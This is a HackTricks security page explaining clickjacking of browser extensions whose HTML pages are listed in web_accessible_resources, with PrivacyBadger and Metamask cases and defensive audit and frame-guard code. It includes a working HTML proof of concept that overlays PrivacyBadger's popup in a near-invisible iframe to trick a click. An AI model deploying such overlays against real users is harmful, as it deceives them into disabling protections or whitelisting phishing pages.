# BrowExt - ClickJacking
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
## Basic Information

This page is going to abuse a ClickJacking vulnerability in a browser extension.

If you don't know what ClickJacking is, check:

{% content-ref url="../clickjacking.md" %} clickjacking.md {% endcontent-ref %}

Extensions contain the file `manifest.json`, and that JSON file has a field `web_accessible_resources`. Here's what the Chrome docs say about it:

> These resources would then be available in a webpage via the URL `chrome-extension://[PACKAGE ID]/[PATH]`, which can be generated with the `extension.getURL` method. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.

In addition to being web accessible, the resources in `web_accessible_resources` run with the ambient authority of the extension: they can alter state, load other resources, and modify the browser in certain ways. If a document in `web_accessible_resources` can perform any interesting behavior, an attacker can embed it in a webpage and trick visitors into triggering it.
## PrivacyBadger Example

It was discovered that in the PrivacyBadger extension the contents of the directory `skin/` were listed in `web_accessible_resources`:

```json
"web_accessible_resources": [
  "skin/*",
  "icons/*"
]
```

So, by loading `skin/popup.html` (the document that gets rendered when you click the PrivacyBadger icon in the browser) in an iframe, we could fool the user into clicking "Disable PrivacyBadger for this Website", opening up the user to additional tracking and undermining the function of PrivacyBadger. Check the ClickJacking video example in https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm

The fix was easy: remove `/skin/*` from the `web_accessible_resources`.
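The root cause in both the Basic Information section and the PrivacyBadger fix is the same: an HTML document of the extension listed under `web_accessible_resources` can be framed by any website. The following is an added example (not the page's own code and not PrivacyBadger's) of a manifest audit a reviewer can run before shipping: it expands each `web_accessible_resources` glob against the files bundled in the extension and reports every HTML document reachable from web origins. It handles Manifest V2 (a list of globs, reachable from every origin) and Manifest V3 (objects with `resources` and `matches`, where `matches` limits which origins may load them). The file list, manifests and glob semantics (only `*` is a wildcard) are this example's own assumptions.

```javascript
// Added example (not the page's own code nor PrivacyBadger's): audit an extension
// manifest for web_accessible_resources entries that expose HTML documents to
// web origins, the precondition for framing an extension page as described above.
// Handles Manifest V2 (array of glob strings) and Manifest V3 (array of objects
// with "resources" and "matches"). The file list below is a constructed sample.

// Turn a manifest glob such as "skin/*" into an anchored RegExp.
// Assumption: only "*" is a wildcard, matching any run of characters.
function globToRegExp(glob) {
  const escaped = glob
    .replace(/[.+?^${}()|[\]\\]/g, '\\$&')
    .replace(/\*/g, '.*');
  return new RegExp('^' + escaped + '$');
}

// Match patterns that let any website load the resource.
const BROAD_MATCHES = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

// Normalise both manifest versions into [{ resources, matches }].
// In V2 every listed resource is reachable from every origin.
function normaliseWar(manifest) {
  const war = manifest.web_accessible_resources || [];
  if (manifest.manifest_version === 3) {
    return war.map(e => ({ resources: e.resources || [], matches: e.matches || [] }));
  }
  return [{ resources: war, matches: ['<all_urls>'] }];
}

// Return one finding per HTML document reachable from web pages.
// severity "high": any site can frame it; "medium": only the listed origins can.
function auditWebAccessibleResources(manifest, files) {
  const findings = [];
  for (const entry of normaliseWar(manifest)) {
    const broad = entry.matches.some(m => BROAD_MATCHES.has(m));
    for (const glob of entry.resources) {
      const re = globToRegExp(glob);
      for (const file of files) {
        if (re.test(file) && /\.html?$/i.test(file)) {
          findings.push({ pattern: glob, file, severity: broad ? 'high' : 'medium' });
        }
      }
    }
  }
  return findings;
}

// Constructed sample of the files bundled in the extension package.
const bundledFiles = [
  'skin/popup.html', 'skin/popup.js', 'skin/css/popup.css',
  'icons/badger-32.png', 'js/background.js',
];

// Manifest V2 shaped like the vulnerable excerpt above, and its fixed form.
const vulnerableManifest = { manifest_version: 2, web_accessible_resources: ['skin/*', 'icons/*'] };
const fixedManifest = { manifest_version: 2, web_accessible_resources: ['icons/*'] };

// Manifest V3: the same popup exposed only to one origin (constructed example).
const mv3RestrictedManifest = {
  manifest_version: 3,
  web_accessible_resources: [
    { resources: ['skin/popup.html'], matches: ['https://example.test/*'] },
  ],
};

for (const [name, m] of Object.entries({ vulnerableManifest, fixedManifest, mv3RestrictedManifest })) {
  console.log(name, JSON.stringify(auditWebAccessibleResources(m, bundledFiles)));
}
```

Run with `node audit.js`: the V2 manifest with `skin/*` yields one high-severity finding for `skin/popup.html`, the fixed manifest yields none, and the V3 manifest yields a medium finding because only `https://example.test` may load the popup. A wildcard such as `skin/*` is the usual way an HTML document ends up exposed by accident, so the audit expands globs rather than inspecting the literal strings.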
### PoC

```html
<style>
  iframe {
    width: 430px;
    height: 300px;
    opacity: 0.01;
    float: top;
    position: absolute;
  }
  #stuff {
    float: top;
    position: absolute;
  }
  button {
    float: top;
    position: absolute;
    top: 168px;
    left: 100px;
  }
</style>
<div id="stuff">
  <h1>
    Click the button
  </h1>
  <button id="button">
    click me
  </button>
</div>
<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>
```
## Metamask Example

A blog post about a ClickJacking in Metamask can be found here. In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was `https:` or `http:` (not `chrome:`, for example).

Another ClickJacking fixed in the Metamask extension was that users were able to click to whitelist a page when it was flagged as suspected phishing, because of `"web_accessible_resources": ["inpage.js", "phishing.html"]`. As that page was vulnerable to ClickJacking, an attacker could abuse it by showing something harmless-looking to make the victim click to whitelist it without noticing, and then go back to the phishing page, which would then be whitelisted.
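Both Metamask fixes above amount to an extension page refusing to act when it was not opened by the extension itself. The following is an added example (not Metamask's code and not the page's own) of a defence-in-depth guard an extension page can run before rendering a sensitive control such as a "whitelist" or "disable for this site" button: it refuses to render when the document is framed by anything other than the extension's own origin, and fails closed when the framing origin cannot be determined. The decision is a pure function so it can be tested outside a browser; the field names (`isFramed`, `ancestorOrigins`, `selfOrigin`), the reason strings and the placeholder extension id are this example's own assumptions.

```javascript
// Added example (not Metamask's or the page's own code): refuse to render a
// sensitive extension page when it is framed by a web origin. Pure decision
// logic first, browser wiring second, so the logic can run under Node.

// Decide whether the page may render. Field names are this example's own.
function framingDecision({ isFramed, ancestorOrigins, selfOrigin }) {
  if (!isFramed) return { render: true, reason: 'top-level' };
  // Chromium exposes location.ancestorOrigins. If it is missing or empty we
  // cannot prove who framed us, so fail closed.
  if (!ancestorOrigins || ancestorOrigins.length === 0) {
    return { render: false, reason: 'framed-by-unknown' };
  }
  // Every ancestor (not just the parent) must be the extension itself.
  const allOurs = ancestorOrigins.every(origin => origin === selfOrigin);
  return allOurs
    ? { render: true, reason: 'framed-by-self' }
    : { render: false, reason: 'framed-by-web-origin' };
}

// Browser wiring: call this before any event handlers are attached.
// Returns null when no window/document exists (e.g. under Node).
function guardExtensionPage(doc = globalThis.document, win = globalThis.window) {
  if (!win || !doc) return null;
  const decision = framingDecision({
    isFramed: win.self !== win.top,
    ancestorOrigins: Array.from(win.location.ancestorOrigins || []),
    selfOrigin: win.location.origin, // chrome-extension://<id> for extension pages
  });
  if (!decision.render) {
    // Replace the UI with a static notice so there is nothing left to click.
    doc.documentElement.innerHTML = '<p>This page cannot be displayed in a frame.</p>';
  }
  return decision;
}

// Constructed scenarios with a placeholder extension origin.
const SELF = 'chrome-extension://exampleextensionid';
const scenarios = {
  opened_from_toolbar: { isFramed: false, ancestorOrigins: [], selfOrigin: SELF },
  framed_by_website:   { isFramed: true, ancestorOrigins: ['https://attacker.example'], selfOrigin: SELF },
  framed_by_extension: { isFramed: true, ancestorOrigins: [SELF], selfOrigin: SELF },
  framed_unknown:      { isFramed: true, ancestorOrigins: [], selfOrigin: SELF },
};
for (const [name, s] of Object.entries(scenarios)) {
  console.log(name, JSON.stringify(framingDecision(s)));
}
```

Keep the manifest change as the primary fix: a page that is not listed in `web_accessible_resources` cannot be framed by a website at all, and this guard only limits the damage if such a page is exposed again later. Checking every entry of `ancestorOrigins` rather than only the parent matters because an attacker page can nest an extension-origin frame between itself and the target.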
## Steam Inventory Helper Example

Check the following page to see how an XSS in a browser extension was chained with a ClickJacking vulnerability:

{% content-ref url="browext-xss-example.md" %} browext-xss-example.md {% endcontent-ref %}